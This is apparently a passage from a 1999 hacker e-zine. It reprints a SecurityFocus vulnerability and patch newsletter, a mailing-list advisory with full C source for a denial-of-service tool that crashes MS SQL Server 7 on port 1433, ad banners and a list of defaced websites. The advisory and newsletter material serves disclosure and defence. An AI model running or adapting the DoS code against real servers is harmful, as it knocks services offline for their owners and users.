      Date Published: 1999-11-24
      Relevant URL:
      http://www.securityfocus.com/bid/820
      Summary:
      
      The Mdaemon mail server for Windows includes a small web server for
      web-based remote administration. This webserver is vulnerable due to an
      unchecked buffer that handles incoming GET requests. An abnormally large
      URL sent to the WebConfig service at port 2002 will crash the service.
      
      6. Cabletron SSR ARP Flood DoS Vulnerability
      BugTraq ID: 821
      Remote: Yes
      Date Published: 1999-11-24
      Relevant URL:
      http://www.securityfocus.com/bid/821
      Summary:
      
      The Cabletron SmartSwitch Router 8000 with firmware revision 2.x has been
      shown to susceptible to a denial of service attack. The SSR can only
      handle approximately 200 ARP requests per second. If an attacker can get
      ICMP traffic to the router, they can flood it with ARP requests,
      effectively shutting the router down for the duration of the attack.
      
      7. Netscape Navigator Long ASP Argument Vulnerability
      BugTraq ID: 822
      Remote: Yes
      Date Published: 1999-11-26
      Relevant URL:
      http://www.securityfocus.com/bid/822
      Summary:
      
      Netscape Communicator 4.7 has been shown to crash when an argument of 800
      characters is supplied to a command in an asp page. Some of the data
      passed as the argument makes it into the EIP and EBP registers, so
      execution of arbitrary code is a possibility. The overflow could be
      embedded in a link on a webpage or in an email message for remote attacks.
      
      8. Deerfield WorldClient Long URL DoS Vulnerability
      BugTraq ID: 823
      Remote: Yes
      Date Published: 1999-11-26
      Relevant URL:
      http://www.securityfocus.com/bid/823
      Summary:
      
      Deerfield's WorldClient is an email webserver that allows it's users to
      retrieve email via HTTP.  It is susceptible to denial of service attacks
      due to an unchecked buffer in the request handler. Supplying a long url
      will crash the server.
      
      9. SCO Xsco Buffer Overflow Vulnerability
      BugTraq ID: 824
      Remote: No
      Date Published: 1999-11-25
      Relevant URL:
      http://www.securityfocus.com/bid/824
      Summary:
      
      Under certain versions of Unixware, the SUID program Xsco is vulnerable to
      a buffer overflow attack. The problem lies in that Xsco does not sanity
      check user supplied data.
      
      10. SCO xlock(1) (long username) Buffer Overflow Vulnerability
      BugTraq ID: 825
      Remote: No
      Date Published: 1999-11-25
      Relevant URL:
      http://www.securityfocus.com/bid/825
      Summary:
      
      Certain versions of Unixware ship with a version of xlock which is
      vulnerable to a buffer overflow attack. The xlock(1) program locks the
      local X display until a username and password are entered. In this
      instance a user can provide an overly long username and overflow a buffer
      in xlock(1). Given that xlock(1) runs SUID root this will result in a root
      compromise.
      
      11. SCO su(1) Buffer Overflow Vulnerability
      BugTraq ID: 826
      Remote: No
      Date Published: 1999-11-25
      Relevant URL:
      http://www.securityfocus.com/bid/826
      Summary:
      
      Certain versions of Unixware ship with a version of su(1) which is
      vulnerable to a buffer overflow attack. This attack is possible because
      su(1) fails to sanity check user supplied data, in this instance a
      username supplied on the command line. Because su(1) is SUID root this
      attack may result in root privileges.
      
      
      III. PATCH UPDATES 1999-11-21 to 1999-11-27
      -------------------------------------------
      
      
      1. Vendor: Red Hat
      Product: RedHat Linux
      Patch Location:
      Red Hat Linux 4.x:
      
       Intel:
      ftp://updates.redhat.com/4.2/i386/sysklogd-1.3.31-0.5.i386.rpm
        ftp://updates.redhat.com/4.2/i386/libc-5.3.12-18.5.i386.rpm
        ftp://updates.redhat.com/4.2/i386/libc-debug-5.3.12-18.5.i386.rpm
      ftp://updates.redhat.com/4.2/i386/libc-devel-5.3.12-18.5.i386.rpm
      ftp://updates.redhat.com/4.2/i386/libc-profile-5.3.12-18.5.i386.rpm
      ftp://updates.redhat.com/4.2/i386/libc-static-5.3.12-18.5.i386.rpm
      
       Alpha:
      ftp://updates.redhat.com/4.2/alpha/sysklogd-1.3.31-0.5.alpha.rpm
      
       Sparc:
      ftp://updates.redhat.com/4.2/sparc/sysklogd-1.3.31-0.5.sparc.rpm
      ftp://updates.redhat.com/4.2/sparc/libc-5.3.12-18.5.sparc.rpm
      ftp://updates.redhat.com/4.2/sparc/libc-debug-5.3.12-18.5.sparc.rpm
      ftp://updates.redhat.com/4.2/sparc/libc-devel-5.3.12-18.5.sparc.rpm
      ftp://updates.redhat.com/4.2/sparc/libc-profile-5.3.12-18.5.sparc.rpm
      ftp://updates.redhat.com/4.2/sparc/libc-static-5.3.12-18.5.sparc.rpm
      
       Source packages:
      ftp://updates.redhat.com/4.2/SRPMS/sysklogd-1.3.31-0.5.src.rpm
      ftp://updates.redhat.com/4.2/SRPMS/libc-5.3.12-18.5.src.rpm
      
       Red Hat Linux 5.x:
      
       Intel:
      ftp://updates.redhat.com/5.2/i386/sysklogd-1.3.31-1.5.i386.rpm
      
       Alpha:
      ftp://updates.redhat.com/5.2/alpha/sysklogd-1.3.31-1.5.alpha.rpm
      
       Sparc:
      ftp://updates.redhat.com/5.2/sparc/sysklogd-1.3.31-1.5.sparc.rpm
      
       Source packages:
      ftp://updates.redhat.com/5.2/SRPMS/sysklogd-1.3.31-1.5.src.rpm
      
       Red Hat Linux 6.0:
      
       Intel:
      ftp://updates.redhat.com/6.0/i386/sysklogd-1.3.31-14.i386.rpm
      
      
       Alpha:
      ftp://updates.redhat.com/6.0/alpha/sysklogd-1.3.31-14.alpha.rpm
      
       Sparc:
      ftp://updates.redhat.com/6.0/sparc/sysklogd-1.3.31-14.sparc.rpm
      
       Source packages:
      ftp://updates.redhat.com/6.0/SRPMS/sysklogd-1.3.31-14.src.rpm
      
       Red Hat Linux 6.1:
      
       Intel:
      ftp://updates.redhat.com/6.1/i386/sysklogd-1.3.31-14.i386.rpm
      
       Source packages:
      ftp://updates.redhat.com/6.1/SRPMS/sysklogd-1.3.31-14.src.rpm
      
      The following patches are for Cobalt Networks RAQ and Qube servers which run RedHat Linux:
      
       RPMS:
       -RaQ3-
      ftp://ftp.cobaltnet.com/pub/experimental/security/i386/sysklogd-1.3.33-9C1.i386.rpm
       -RaQ1 RaQ2 Qube1 Qube2-
      ftp://ftp.cobaltnet.com/pub/experimental/security/mips/sysklogd-1.3.33-9C2.mips.rpm
      
       SRPMS:
      ftp://ftp.cobaltnet.com/pub/experimental/security/srpms/sysklogd-1.3.33-9C1.src.rpm
      ftp://ftp.cobaltnet.com/pub/experimental/security/srpms/sysklogd-1.3.33-9C2.src.rpm
      
      Vulnerability Patched: Linux syslogd Denial of Service Vulnerability
      BugTraq ID:  809
      Relevant URLS:
      http://www.securityfocus.com/bid/809
      
      2. Vendor: Sun Mircosystems
      Product: Solaris 7
      Patch Location:
      
      http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/patch-license&nav=pub-patches
      Vulnerability Patched: Solaris rpc.ttdbserver Denial of Service Vulnerability
      BugTraq ID: 811
      Relevant URLS:
      http://www.securityfocus.com/bid/811
      
      3. Vendor: Cabletron
      Product: Cabletron SmartSwitch Router 8000 firmware 2.x
      Patch Location:
      http://www.cabletron.com/download/download.cgi?lib=ssr
      Vulnerability Patched: Cabletron SSR ARP Flood DoS Vulnerability
      BugTraq ID: 821
      Relevant URLS:
      http://www.securityfocus.com/bid/821
      
      4. Vendor: SCO
      Product: Unixware
      Patch Location:
      
      Anonymous ftp (World Wide Web URL):
      
      ftp://ftp.sco.COM/SSE/sse039.ltr (cover letter, ASCII text)
        ftp://ftp.sco.COM/SSE/sse039.tar.Z (new binaries, compressed tar
        file)
      
      Compuserve:
      
       GO SCOFORUM, and search Library 11 (SLS/SSE Files) for these
       filenames:
      
       SSE039.LTR (cover letter, ASCII text)
       SSE039.TAZ (new binaries, compressed tar file)
      
      Vulnerability Patched: SCO su(1) Buffer Overflow Vulnerability
      BugTraq ID: 826
      Relevant URLS:
      http://www.sco.com/support/ftplists/index.html
      http://www.securityfocus.com/bid/
      
      5. Vendor: Caldera
      Product: Caldera OpenLinux (and its other distributions)
      Patch Location:
      ftp://ftp.calderasystems.com/pub/OpenLinux/updates/2.3/current/RPMS/
      Vulnerability Patched:  Pine Environment Variable Expansion in URLS Vulnerability
      BugTraq ID: 810
      Relevant URLS:
      http://www.securityfocus.com/bid/810
      
      INCIDENTS SUMMARY 1999-11-21 to 1999-11-27
      ------------------------------------------
      
      1. Re: Port 137 and snmp scans (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=Pine.LNX.4.10.9911220749020.615-100000@epr0.org
      
      2. SunOS rpcbind scans (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=XFMail.991122220828.ldavis@fastq.com
      
      3. Re: cracker probing 1542 (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991122172139.12644.qmail@securityfocus.com
      
      4. Re: rpc logging (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991122224453.1743.qmail@securityfocus.com
      
      5. SANS and CERT ICMP advisories (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991123051240.12076.qmail@securityfocus.com
      
      6. Fw: unsolicited connection(s) (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=01aa01bf3599$17618a40$30a238cd@bbn.com
      
      7. F5's 3DNS signature + Cisco Distrib Dir (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991124021152.13054.qmail@securityfocus.com
      
      8. Insane amount of probes from 216.212.in-addr.arpa (tin.it) (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=Pine.LNX.4.05.9911250211030.30972-100000@bean.xtdnet.nl
      
      9. BIND Scanning (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=Pine.SOL.4.10.9911251135010.20417-100000@yuma.Princeton.EDU
      
      10. sweep (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991125164633.23732.qmail@securityfocus.com
      
      11. pop3/imap crawler.. (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991126132342.G28629@obfuscation.org
      
      12. UK Law & Cases Re Malicious action/attacks (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=004f01bf3810$414d9960$050010ac@xtranet.co.uk
      
      13. cgi attack
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=383F9790.150177EB@eti.cc.hun.edu.tr
      
      14. Re: problems from ip69.net247221.cr.sk.ca[24.72.21.69] (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=3841bb7e.1d7.0@infolink.com.br
      
      15. Port 98 scans & new 3128/8080 scans
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=14401.22457.121945.823373@cap-ferrat.albourne.com
      
      
      V. VULN-DEV RESEARCH LIST SUMMARY 1999-11-21 to 1999-11-27
      ----------------------------------------------------------
      
      1. Re: icq accounts (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=19991122182152.P26100@willamette.edu
      
      2. Re: WordPad/riched20.dll buffer overflow (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=18692.991122@iname.com
      
      3. SSH exploit (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=383C072F.408BE3FC@core-sdi.com
      
      4. lanma256.bmp/lanmannt.bmp security risk? (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=3EE01C3AD21BD211B73C0008C72833F9582BA0@exchange.ls.se
      
      5. Re: development of wordpad exploit (Thread)
      Relevant URL:
      http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=19991122121349.4947.qmail@home1.gmx.net
      
      
      VI.  SECURITY JOBS SUMMARY 1999-11-21 to 1999-11-27
      ---------------------------------------------------
      
      1. SecurityFocus.com is looking for staff writers for a Windows NT column!
      Reply to: Alfred Huger <ah@securityfocus.com>
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-22&msg=Pine.GSO.4.10.9911231458200.4263-100000@www.securityfocus.com
      
      2. NYC - Internet Security Position
      Reply to: timoe@interworld.com
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-22&msg=19991124200337.15430.qmail@securityfocus.com
      
      3. Security Research Engineer
      Reply to: Samuel Cure <scure@iss.net>
      Position Requirements:
      http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-22&msg=19991124201148.15891.qmail@securityfocus.com
      
      
      VII.  SECURITY SURVEY 1999-11-15 to 1999-11-27
      ----------------------------------------------
      
      The question for 1999-11-15 to 1999-11-27 was:
      
      Which Security conference do you think is more useful to attendees? (Bang
      for your buck)
      
      SANS 31% / 30 votes 
      BlackHat 15% / 15 votes 
      TISC 4% / 4 votes 
      CSI 5% / 5 votes 
      Chaos Communications Congress 6% / 6 votes 
      Defcon 30% / 29 votes 
      
      Total number of votes: 94 votes
      
      
      VIII.  SECURITY FOCUS TOP 6 TOOLS 1999-11-21 to 1999-11-27
      --------------------------------------------------------
      
      1. SecurityFocus.com Pager
      by SecurityFocus.com
      URL: http://www.securityfocus.com/pager/sf_pgr20.zip
      Platforms: Win95/98/NT
      Number of downloads: 1690
      
      This program allows the user to monitor additions to the Security Focus
      website without constantly maintaining an open browser. Sitting quietly in
      the background, it polls the website at a user-specified interval and
      alerts the user via a blinking icon in the system tray, a popup message or
      both (also user-configurable).
      
      2. Lookout
      by Dragonmount Networks
      URL: http://www.dragonmount.net/software/lookout/
      Platforms: Windows 2000, Windows 95/98 and Windows NT
      Number of downloads: 1222
      
      Lookout provides raw access to data sent over a TCP connection, allowing
      the inspection of protocols and the testing of buffers. Lookout connects
      to a foreign host's port and allows you to communicates with the host.
      Alternatively,Lookout can listen on a port and wait for another host to
      connect. Lookout can send variable length strings to test buffers easily.
      
      3. cgicheck99 0.4
      by deepquest
      URL: http://www.deepquest.pf/
      
      Platforms: BSDI, BeOS, DOS, FreeBSD, HP-UX, IRIX, Linux, MacOS, NetBSD,
      OS/2, OpenBSD, OpenVMS, PalmOS, Solaris, SunOS, UNIX, Windows 2000,
      Windows 3.x, Windows 95/98, Windows CE and Windows NT Number of downloads:
      1079
      
      This is one of the worlds most cross platform cgi scanners, running on 37
      operating systems! Even Palmos soon! Will check for 119 of common cgi and
      other remote issues. Plus it will report you the Bugtraq ID of some
      vulnerabilities. Get the rebol interpreter at http://www.rebol.com.
      
      
      4. HookProtect
      by ANNA Ltd., pcihprot@anna.zaporizhzhe.ua
      URL: http://www.geocities.com/SiliconValley/Hills/8839/index.html
      Platforms: Windows 95/98 and Windows NT
      Number of downloads: 777
      
      HookProtect version 2.05 is an another powerful product of PCinvestigator
      series. It is specialized on detecting the programs that infringe the
      privacy and confidentiality on personal computers. There are many various
      types of such programs: keyloggers, interceptors, spies, Trojans and so
      on. Their main function is monitoring of some kind of user's activity on a
      computer (for example, typing the text, running the applications, opening
      the windows, Internet activity, etc.).
      
      5. Pandora for Linux v4 beta 2
      by Nomad Mobile Research Centre
      URL: http://www.nmrc.org/pandora
       Platforms: Linux
      Number of downloads: 693
      
      BETA - Online point and click auditing of Novell Netware from Windows NT.
      Currently spoofing works but lots of crashes on SP3 (we're working on it).
      Attach to server with password hashes extracted from Offline program.
      Search for target servers. Attach to a server and grab user accounts
      without logging in. Dictionary attack against user account. Multiple
      Denial of Service attacks. Improved spoofing and hijacking by using
      realtime sniffing. Works against Netware 4 and 5.
      
      6. Sun Enterprise Network Security Service Early Access 1
      by Sun Microsystems
      URL: http://www.sun.com/software/communitysource/senss/
      Platforms: Java
      Number of downloads: 637
      
      Sun Enterprise Network Security Service (SENSS) is a flexible, Java-based
      security solution: a tool that enables organizations to audit and secure
      their systems and networks in a modern, heterogeneous, corporate intranet.
      
      The SENSS software is not yet complete; this is the Early Access 1
      release, made available for the benefit of parties with a professional
      interest in network security, for their experimentation and comment.
      
      The source code is licensed under the Sun Community Source-Code License,
      consistent with the Sun Community Source License principles.
      
      
      IX. SPONSOR INFORMATION -
      ------------------------------------------
      
      URL: http://www.core-sdi.com
      
      CORE SDI is an international computer security research and development
      company. It's clients include 3 of the Big 5 chartered accountant firms
      for whom CORE SDI develops customized security auditing tools as well as
      several notable computer security product vendors, such as Network
      Associates. CORE SDI also has extensive experiance dealing with financial
      and government contracts through out Latin and North America.
      
      X. SUBSCRIBE/UNSUBSCRIBE INFORMATION
      -------------------------------------
      
      1.  How do I subscribe?
      
        Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body
      of:
      
        SUBSCRIBE SF-NEWS Lastname, Firstname
      
        You will receive a confirmation request message to which you will have
      to anwser.
      
      2.  How do I unsubscribe?
      
        Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed
      address with a message body of:
      
        UNSUBSCRIBE SF-NEWS
      
        If your email address has changed email aleph1@securityfocus.com and I
      will manualy remove you.
      
      3.  How do I disable mail delivery temporarily?
      
        If you will are simply going in vacation you can turn off mail delivery
      without unsubscribing by sending LISTSERV the command:
      
        SET SF-NEWS NOMAIL
      
        To turn back on e-mail delivery use the command:
      
        SET SF-NEWS MAIL
      
      4.  Is the list available in a digest format?
      
        Yes. The digest generated once a day.
      
      5.  How do I subscribe to the digest?
      
        To subscribe to the digest join the list normally (see section 0.2.1)
      and then send a message to LISTSERV@SECURITYFOCUS.COM with with a message
      body of:
      
        SET SF-NEWS DIGEST
      
      6. How do I unsubscribe from the digest?
      
        To turn the digest off send a message to LISTSERV with a message body
      of:
      
        SET SF-NEWS NODIGEST
      
        If you want to unsubscribe from the list completely follow the
      instructions of section 0.2.2 next.
      
      7. I seem to not be able to unsubscribe. What is going on?
      
        You are probably subscribed from a different address than that from
      which you are sending commands to LISTSERV from. Either send email from
      the appropiate address or email the moderator to be unsubscribed manually.
      
      
      
      Alfred Huger
      VP of Engineering
      SecurityFocus.com
      
      @HWA      
      
28.0  SQL 7 "Magic Packet" DoS
      ~~~~~~~~~~~~~~~~~~~~~~~~
      
      From NTSecurity list
      
      Kevork Belian discovered this on Dec. 1.  I have been working with his code
      trying to replicate the results but have yet to be successful.  This does
      not
      mean that Kevork's findings are incorrect, it just means that I need to do
      more testing.
      
      I don't believe in holding information back from the mailing list so here
      are the complete details as received from Kevork.  Including his code.
      
      This was tested on SQL 7.00.699
      
      MS SQL Server TCP/IP net library must be enabled.  Sending more than 3 NULL
      bytes in the TCP data can crash the SQL Server.  MS SQL listens on TCP port
      1433.  If this attack is successful you will see an event 17055 in your log
      and you will have to reboot to restore service.
      
      It has been suggested that a solution would be to block incoming traffic on
      port 1433 or disable the TCP/IP net library.  Of course this could have an
      impact on the functionality of the product.  It would be preferable to have
      a MS hotfix for this issue.  Microsoft has been notified and are working on
      the situation themselves.
      
      It is unknown at this time if this attack is actually being carried out.
      
      ============ original text from Kevork Belian========
      
      Description:
      MS SQL Server 7.0 silently crashes when sent a TCP packet containing more
      than 2 NULLs as data.
      I tested this on machines running SQL Server version 7.00.699 (SP 1). The NT
      box is running NT Server with SP 4 (I don't think the Service Pack is an
      issue since NT is not affected).
      If the TCP/IP net library is enabled, the 3 or greater NULL bytes crash SQL
      Server listening on port 1433. The SQL server raises an event 17055 with
      fatal exception EXCEPTION_ACCESS VIOLATION.
      
      I have noticed that you might experience a situation when the SQL Server
      won't crash at first; keep  resending the packet until it crashes
      (hopefully).
      
      It puzzles me why other people weren't able to reproduce it. Is it a
      misconfiguartion issue (I seriosly doubt it).
      
      thanks
      
      Kevork Belian
      
      ========end text=========
      
      ====begin script from Kevork Belian=====
      
      /*
      ** sqldos.c -- a DoS attack agains MS SQL Server
      */
      
      #include <stdio.h>
      #include <stdlib.h>
      #include <errno.h>
      #include <string.h>
      #include <netdb.h>
      #include <sys/types.h>
      #include <netinet/in.h>
      #include <sys/socket.h>
      
      #define PORT 1433    /* the port SQL Server listens on */
      
      
      int main(int argc, char *argv[])
      {
          int sockfd, numbytes;
          struct hostent *he;
          char buff[65535];
          struct sockaddr_in target_addr;
      
          if (argc != 2) {
              fprintf(stderr,"Usage: sqldos target\n");
              exit(1);
          }
      
          if ((he=gethostbyname(argv[1])) == NULL)
      
              perror("gethostbyname");
              exit(1);
          }
      
          if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
              perror("socket error");
              exit(1);
          }
      
          target_addr.sin_family = AF_INET;
          target_addr.sin_port = htons(PORT);
          target_addr.sin_addr = *((struct in_addr *)he->h_addr);
          bzero(&(target_addr.sin_zero), 8);
      
          if (connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct
      sockaddr)) == -1) {
              perror("connect error");
              exit(1);
          }
          memset(&buff, 0, 3);
      
          if ((numbytes=send(sockfd, buff, 14, 0)) == -1) {
              perror("send errot");
              exit(1);
          }
          close(sockfd);
      
          return 0;
      }
      
      =======end script=========
      
      Of course credit has to go to Kevork Belian as he made the discovery.  I
      would be interested to hear if anyone else can replicate this.
      
      Regards;
      
      
      Steve Manzuik
      Moderator
      Win2K Security Advice
      
      _____________________________________________________________________
      ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
      ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
      SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net
      
      @HWA      
      

      
      -=----------=-         -=----------=-        -=----------=-       -=----------=- 
                                           
                                             0                                     
                                             0                                     
                                             0
                                             o
                                           O O O   
                                             0
                                                                     
                                                                                  
      =----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
      
      =----------=-   -=----------=-    -=----------=-   -=----------=-  -=----------=-
     
     
         



     
     
     
     
     
AD.S  ADVERTI$ING.           The HWA black market                    ADVERTISEMENT$.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                              _                _   _     _
                     /\      | |              | | (_)   (_)
                    /  \   __| |_   _____ _ __| |_ _ ___ _ _ __   __ _
                   / /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` |
                  / ____ \ (_| |\ V /  __/ |  | |_| \__ \ | | | | (_| |
                 /_/    \_\__,_| \_/ \___|_|   \__|_|___/_|_| |_|\__, |
                                                                  __/ |
                                                                 |___/
                                                                 
                                                                 
       ADVERTISING IS FREE, SEND IN YOUR ADS TO CRUCIPHUX@DOK.ORG FOR INCLUSION HERE                                                                  

      
      
       *****************************************************************************
       *                                                                           *
       *           ATTRITION.ORG     http://www.attrition.org                      *
       *           ATTRITION.ORG     Advisory Archive, Hacked Page Mirror          *
       *           ATTRITION.ORG     DoS Database, Crypto Archive                  *
       *           ATTRITION.ORG     Sarcasm, Rudeness, and More.                  * 
       *                                                                           *
       *****************************************************************************      
              
 
 
       When people ask you "Who is Kevin Mitnick?" do you have an answer? 
 
       www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
       n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
       m www.2600.com ########################################ww.2600.com www.freeke
       vin.com www.kev#  Support 2600.com and the Free Kevin #.com www.kevinmitnick.
       com www.2600.co#  defense fund site, visit it now! .  # www.2600.com www.free
       kevin.com www.k#             FREE EVIN!              #in.com www.kevinmitnic
       k.com www.2600.########################################om www.2600.com www.fre
       ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
       k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre

       http://www.2600.com/  http://www.kevinmitnick.com
       
       
       +-----------------------------------------------------------------------------+
       | SmoG Alert ..           http://smog.cjb.net/        NEWS on SCIENCE         |
       | ===================     http://smog.cjb.net/        NEWS on SECURITY        |
       | NEWS/NEWS/NEWS/NEWS     http://smog.cjb.net/        NEWS on THE NET         |
       |                         http://smog.cjb.net/        NEWS on TECHNOLOGY      |
       +-----------------------------------------------------------------------------+
       
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
       *   www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net     *
       *  http://www.csoft.net" One of our sponsers, visit them now  www.csoft.net   * 
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
       * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       
       

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


         //////////////////////////////////////////////////////////////////////////////
        //  To place an ad in this section simply type it up and email it to        //
       //        hwa@press,usmc.net, put AD! in the subject header please. - Ed    //
      //     or cruciphux@dok.org                                                 //
      //////////////////////////////////////////////////////////////////////////////


     @HWA
     
       
              
             
HA.HA Humour and puzzles ...etc
      ~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Don't worry. worry a *lot*
     
      Send in submissions for this section please! ............c'mon, you KNOW you
      wanna...yeah you do...make it fresh and new...be famous...<sic> 
      
      
      
       
       
 SITE.1   
          
            
      You can Send in submissions for this section too if you've found 
      (or RUN) a cool site...
       
        
       
      @HWA
       
         
         
  H.W Hacked websites 
     ~~~~~~~~~~~~~~~~
    
                    ___|                  _ \               |
                   |      __| _` |\ \  / |   |  __| _ \  _` |
                   |     |   (   | `  <  |   | |    __/ (   |
                  \____|_|  \__,_| _/\_\\___/ _|  \___|\__,_|


      Note: The hacked site reports stay, especially wsith some cool hits by
            groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

          * Hackers Against Racist Propaganda (See issue #7)

     
      Haven't heard from Catharsys in a while for those following their saga visit
      http://frey.rapidnet.com/~ptah/ for 'the story so far'...
      
      Hacker groups breakdown is available at Attrition.org
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      check out http://www.attrition.org/mirror/attrition/groups.html to see who
      you are up against. You can often gather intel from IRC as many of these
      groups maintain a presence by having a channel with their group name as the
      channel name, others aren't so obvious but do exist.
      
      >Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
      
      
      
      * Info supplied by the attrition.org mailing list.
      
      Listed oldest to most recent...
      
      Defaced domain: sony.com.pa
      Site Title: Sony (Panama) 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/sony.com.pa 
      Operating System: Windows NT (IIS/4.0)
      
      Defaced domain: www.dellnet.com.br
      Site Title: DellNet 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.dellnet.com.br 
      Defaced by: The Death Knights 
      Operating System: Linux
      
      Defaced domain: www.gateway.com.my
      Site Title: Gateway Malaysia 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.gateway.com.my 
      Defaced by: ieet 
      Operating System: Windows NT
      
      Defaced domain: www.honda.com.kw
      Site Title: Honda Korea 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.honda.com.kw 
      Defaced by: ytcracker 
      Operating System: Linux
      
      Defaced domain: www.pcmac.com
      Site Title: PC Mac Consultants 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.pcmac.com 
      Defaced by: cipher 
      Operating System: Windows NT
      
      Defaced domain: homesandloansinc.com
      Site Title: Homes And Loans Inc. 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/homesandloansinc.com 
      Defaced by: Tranzer 
      Operating System: Windows NT
      
      Defaced domain: www.boobshack.com
      Site Title: Boob Shack 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.boobshack.com 
      Defaced by: naptime 
      Operating System: Linux
      
      Previously Hacked
      Defaced domain: www.whitehousehistory.org
      Site Title: The White House Historical Association 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.whitehousehistory.org 
      Defaced by: Einstein 
      Operating System: Windows NT
      Attrition comment: 2nd time hacked
      
      Defaced domain: www.faculdadesantamarta.br
      Site Title: Faculdade Santa Marta 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.faculdadesantamarta.br 
      Defaced by: The Death Knights 
      Operating System: Linux
      
      Previously Hacked
      Defaced domain: sony.com.pa
      Site Title: Sony Panama 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/sony.com.pa 
      Defaced by: Antichrist 
      Operating System: Windows NT
      Attrition comment: 2nd time defaced
      
      Defaced domain: www.ai-security.com
      Site Title: AI Security Inc 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.ai-security.com 
      Defaced by: g e n X h a k 
      Operating System: FreeBSD 2.2.1 - 3.0 (Apache 1.2.6)
      
      Previously Hacked
      Defaced domain: www.monicalewinsky.com
      Site Title: Monica Lewinsky's Web site 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.monicalewinsky.com 
      Defaced by: un1x bowling t34m 
      Operating System: BSDI
      Attrition comment: 4th time defaced
      
      Defaced domain: www.nissan.com.mx
      Site Title: Nissan Mexico 
      Mirror: http://www.attrition.org/mirror/attrition/1999/11/28/www.nissan.com.mx 
      Defaced by: ytcracker 
